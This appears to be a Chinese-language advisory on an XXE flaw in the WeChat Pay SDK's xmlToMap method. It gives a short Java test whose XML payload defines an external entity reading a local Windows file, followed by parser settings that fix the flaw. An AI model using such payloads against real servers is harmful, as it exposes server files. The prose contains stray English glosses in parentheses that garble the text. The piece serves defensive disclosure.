7月3日，微信支付爆出(out)存在(exist)嚴重安全漏洞，可能導緻商戶服務器被入侵。

問題重現

 public static void test() {
        String xmlStr = "<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE xdsec[<!ELEMENT methodname ANY><!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><methodcall><methodname>&xxe;</methodname></methodcall>";
        try {
            System.out.println(xmlStr);
            System.out.println("+++++++++++++++++");
            Map<String, String> hm = WxPayTool.xmlToMap(xmlStr);
            System.out.println("+++++++++++++++++");
            System.out.println(hm);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

xmlToMap方法對應sdk中xmlToMap方法。
運行測試代碼，可以(by)發現本地(land)文件被輸出(out)。

上面隻是(yes)問題的(of)簡單定位，雖然攻擊者不(No)太可能知道微信通知的(of)url,而且實際項目中一(one)般不(No)會将内容直接輸出(out)，但是(yes)攻擊者仍然可以(by)執行其他(he)命名或者通過其他(he)方式獲取到(arrive)服務器上文件或目錄，因此應當盡快修複該問題。

修複方案

DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
            documentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);  //防止可能的(of)SSRF
            documentBuilderFactory.setXIncludeAware(false);
            documentBuilderFactory.setExpandEntityReferences(false);
            documentBuilderFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            documentBuilderFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
            InputStream stream = new ByteArrayInputStream(xmlString.getBytes("UTF-8"));